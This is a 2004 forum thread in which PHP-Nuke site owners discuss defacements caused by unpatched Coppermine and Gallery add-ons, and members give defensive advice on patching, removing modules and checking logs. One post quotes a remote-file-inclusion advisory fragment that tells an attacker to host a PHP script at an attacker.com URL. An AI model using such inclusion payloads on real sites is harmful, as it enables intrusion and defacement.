| Author |
Message |
cprompt
Regular
Joined: Jun 08, 2004
Posts: 64
|
 Posted:
Thu Nov 18, 2004 7:36 pm |
 
|
I think I was hacked.
Running latest Sentinel on Nuke7.5 patched.
http auth activated.
My index.php was replaced with this index.php
| Code: | <html>
<head>
<meta http-equiv="Content-Language" content="pt-br">
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>===[MirrorTeam 2004]===</title>
</head>
<body bgcolor="#000000">
<p align="center"> </p>
<p align="center"> </p>
<p align="center"> </p>
<p align="center"> </p>
<p align="center"><b><font color="#FFFFFF">MirrorTeam </font></b></p>
<p align="center"><font color="#FFFFFF"><b>Bsd off!</b></font></p>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="100%" height="47">
<tr>
<td width="100%" height="47">
<p align="center"><b><font color="#FF0000">FreeBSD www10.powweb.com
4.10-RELEASE FreeBSD 4.10-RELEASE #0: Sat Jul 10 20:43:09 PDT 2004 :/usr/obj/usr/src/sys/POWWEB
i386<br>
</font></b></td>
</tr>
</table>
<p align="center"><a href="mailto:mirrorteam@email.com">mirrorteam@email.com</a></p>
<p align="center"> </p>
</body>
</html> |
That is all that was changed as far as I can tell. |
|
|
|
|
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 16987
Location: Kansas
|
| Posted:
Thu Nov 18, 2004 7:47 pm |
|
Are you using coppermine? |
|
|
  
|
|
TheosEleos
Life Cycles Becoming CPU Cycles
Joined: Sep 18, 2003
Posts: 960
Location: Missouri
|
| Posted:
Thu Nov 18, 2004 7:50 pm |
|
If you are using coppermine what version? |
|
|
 |
|
cprompt
Regular
Joined: Jun 08, 2004
Posts: 64
|
| Posted:
Thu Nov 18, 2004 7:52 pm |
|
OK it gets more interesting. Looks liek evreyone on the site has ADMin status in my Forums. I try changing their permissions back to User, but they don't hold.
I also had no user groups set up and now I have a user group setup with a member that I would not have made a moderator as the group mod...wierd. |
|
|
|
|
|
cprompt
Regular
Joined: Jun 08, 2004
Posts: 64
|
| Posted:
Thu Nov 18, 2004 7:53 pm |
|
I use Coppermine but only my subdomain. Not on my main site which had the index replaced.
crap
v1.2.2b-Nuke |
|
|
|
|
|
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 16987
Location: Kansas
|
| Posted:
Thu Nov 18, 2004 7:56 pm |
|
I believe the egg drop is placed at the server level and so they have access to all your site. |
|
|
|
|
|
cprompt
Regular
Joined: Jun 08, 2004
Posts: 64
|
| Posted:
Thu Nov 18, 2004 8:04 pm |
|
So are we thinking coppermine may be the culprit? I have disabled it pending an upgrade.
I also run Gallery from menalto on the main site version 1.4.2. It need upgraded as well...
boy what a slacker I am. I guess this is just pie in my face so-to-speak. |
|
|
|
|
|
cprompt
Regular
Joined: Jun 08, 2004
Posts: 64
|
| Posted:
Thu Nov 18, 2004 8:14 pm |
|
| TheosEleos wrote: | | If you are using coppermine what version? |
Do you know where I can find the latest version? The link I have is broken. |
|
|
|
|
|
oprime2001
Worker
Joined: Jun 04, 2004
Posts: 119
Location: Chicago IL USA
|
| Posted:
Thu Nov 18, 2004 9:16 pm |
|
| cprompt wrote: | So are we thinking coppermine may be the culprit? I have disabled it pending an upgrade.
I also run Gallery from menalto on the main site version 1.4.2. It need upgraded as well...
boy what a slacker I am. I guess this is just pie in my face so-to-speak. |
Deactivating the coppermine module still leaves your site vulnerable. I had one of my sites defaced when the skiddies used an inactive coppermine theme that I had left unpatched. Remove/rename your inactive coppermine folder and/or coppermine themes. |
|
|
|
|
|
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 16987
Location: Kansas
|
| Posted:
Thu Nov 18, 2004 10:26 pm |
|
| cprompt wrote: | So are we thinking coppermine may be the culprit? I have disabled it pending an upgrade.
I also run Gallery from menalto on the main site version 1.4.2. It need upgraded as well...
boy what a slacker I am. I guess this is just pie in my face so-to-speak. |
For sure. I had 2 egg drops last week on my server because of clients who were running unpatched versions. |
|
|
|
|
|
oprime2001
Worker
Joined: Jun 04, 2004
Posts: 119
Location: Chicago IL USA
|
| Posted:
Thu Nov 18, 2004 10:46 pm |
|
Do you also run the SPChat module? I noticed that you were defaced by skiddies going by MirrorTeam. They seem to be . |
|
|
|
|
|
oprime2001
Worker
Joined: Jun 04, 2004
Posts: 119
Location: Chicago IL USA
|
| Posted:
Thu Nov 18, 2004 11:03 pm |
|
| Raven wrote: | | For sure. I had 2 egg drops last week on my server because of clients who were running unpatched versions. |
don't mean to thread-jack, but I am not sure what Raven means by eggdrop. by eggdrop, do you mean Remote File Inclusion such as:
(from )
| Quote: | E2 - affected is new version:
First get ready your php script in "http://attacker.com/user_list_info_box.inc"
and then:
|
Or do you mean an actual file (egg) is uploaded (dropped) on the server? I'm not aware of a coppermine vulnerability that allows a file to be uploaded to the server. I have seen instances where the Remote File Inclusion was used to create/modify a file on the host server, but the created/modified file is not directly uploaded from the remote server. Regardless, NukeSentinel should catch the Remote File Inclusion attack because of the in the url. |
|
|
|
|
|
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 16987
Location: Kansas
|
| Posted:
Thu Nov 18, 2004 11:06 pm |
|
An actual file is uploaded to your server. It's done through CM upload facility if I remember right. |
|
|
|
|
|
cprompt
Regular
Joined: Jun 08, 2004
Posts: 64
|
| Posted:
Fri Nov 19, 2004 5:31 am |
|
OK then I gueess it's more serious than I thought.
If they dropped a file on my server, how on earth do I find it? PHP-Nuke has hundreds of files.
Is version 1.3 of Coppermine safe?
Is anyone safe? hehe
More and more it seems like it is not necessarily PHP-Nuke that is vulnerable, it is the addons and modules.
I got coppermine updated and Gallery updated. I am running SPchat on both the main and subdomain sites.
I have removed the SPChat for now on both sites. |
|
|
|
|
|
cprompt
Regular
Joined: Jun 08, 2004
Posts: 64
|
| Posted:
Fri Nov 19, 2004 5:36 am |
|
I FOUND IT!!!!!
it is called cancer. It was in my subdomain main directory.
Here is the file if anyone wants to take a look at it.
Admin note: I removed it as it could be used by other srcipt kiddies. |
|
|
|
|
|
jaded
Theme Guru
Joined: Nov 01, 2003
Posts: 1006
|
| Posted:
Fri Nov 19, 2004 8:13 am |
|
I swear to God all web hosts should DEMAND that their clients are not using coppermine or my_egallery. As I stated in another post a few minutes ago. We too have had clients who were eggdropped through gallery. We have banned it. Using them is cause for immediate suspension and or termination. It will be a better day when all web hosts do the same! I wish you luck and hope that you removed all the malicious files. BE 100% sure to totally remove the gallery and ALL references to it including your admin folders. |
|
|
|
|
|
cprompt
Regular
Joined: Jun 08, 2004
Posts: 64
|
| Posted:
Fri Nov 19, 2004 10:16 am |
|
| cprompt wrote: | | Admin note: I removed it as it could be used by other srcipt kiddies. |
thanks...sorry about that. |
|
|
|
|
|
truckerclock
New Member
Joined: Jan 18, 2005
Posts: 7
|
| Posted:
Wed Jan 19, 2005 1:11 am |
|
The same thing happened to me today, my index.php was replaced and all other files deleted. I do have the menalto gallery on my site, is this most likely the problem? I guess the only other way to change the file on the server would be to hack the server or know my password? I also was attacked a couple of days ago, before I had sentinel installed and they changed some files in my sql. After I installed it, I tested it and it seemed to be secure. Are these things most likely random attempts or is someone just targeting me? I have never had problems with security before and am new to this, so any help would be appreciated.
Truckerclock |
|
|
|
|
|
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 16987
Location: Kansas
|
| Posted:
Wed Jan 19, 2005 5:02 am |
|
Depending on the version of Menalto, that is most likely the cause. Anytime uploads are allowed, one has to be ever so careful. NukeSentinel does not (and really can't) address holes in 3rd party software. |
|
|
|
|
|
djmaze
Subject Matter Expert
Joined: May 15, 2004
Posts: 689
Location: http://tinyurl.com/5z8dmv
|
| Posted:
Wed Jan 19, 2005 6:14 am |
|
| jaded wrote: | | I swear to God all web hosts should DEMAND that their clients are not using coppermine or my_egallery. |
And all webhosts guarantee to upgrade apache, php and mysql to latest builds to reduce hack attempts as well ?
Not only customers have a lack to upgrade their software.
Also most hacks are made AFTER a vulnerability is found by someone.
A fix for a vulnerability is 90% of the time released before the first hacker has managed to build a script to hack it. |
|
|
|
|
|
truckerclock
New Member
Joined: Jan 18, 2005
Posts: 7
|
| Posted:
Wed Jan 19, 2005 6:50 am |
|
My site just got hacked again this morning. If uploads by users is turned off in gallery would it make it any safer? I cannot understand why I am being hit so often all of the sudden. This site has been up for almost a year with the same software and no problems, however my site just actually got ranked well in google. My site does not deal with money at all and is just a site for auto enthusiasts. I am using nuke 7.2, should I upgrade to a newer version for safety? I going home now to try to restore the site and secure it. |
|
|
|
|
|
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 16987
Location: Kansas
|
| Posted:
Wed Jan 19, 2005 6:59 am |
|
Yes, turn off uploads and see if you get hacked anymore. |
|
|
|
|
|
oprime2001
Worker
Joined: Jun 04, 2004
Posts: 119
Location: Chicago IL USA
|
| Posted:
Wed Jan 19, 2005 9:04 am |
|
You haven't listed any of your other installed modules. It is unsafe/unwise to assume that the problem lies within Menalto Gallery or any other module unless you've verified the exploit within your server logs. If you don't have access to your server logs, ask your hosts for them. Otherwise, you are merely guessing as to which security hole to plug.
There was a from November 2004 on the , but a later release has fixed this issue. A quick check at the at doesn't bring up any relevant hits.
There are countless other modules with abundant vulnerabilities. Inactive/admin-only modules can still be exploited. Make sure you are trying to fix the actual problem. |
|
|
|
|
|
truckerclock
New Member
Joined: Jan 18, 2005
Posts: 7
|
| Posted:
Wed Jan 19, 2005 9:38 am |
|
I have just deleted everything off of the server and am going to install the patched version of 7.5 and then nuke sentinel and then restrict some access with the .htaccess file. I have downloaded the raw log from my server but am not sure what I am looking for. It shows when every single file was accessed. Around the time I saw it was defaced this morning, there was a lot of activity in the gallery. Is there anyway to tell by the url requested which one was trying to get access? Any unusual stuff in the url? My web host is checking into it also. Thanks for all of your help!
Truckerclock |
|
|
|
|
|
|
|
|
|
![[Valid RSS]](http://www.ravenphpscripts.com/images/valid-rss.png "Validate my RSS feed"){kind=small}
:: 
::
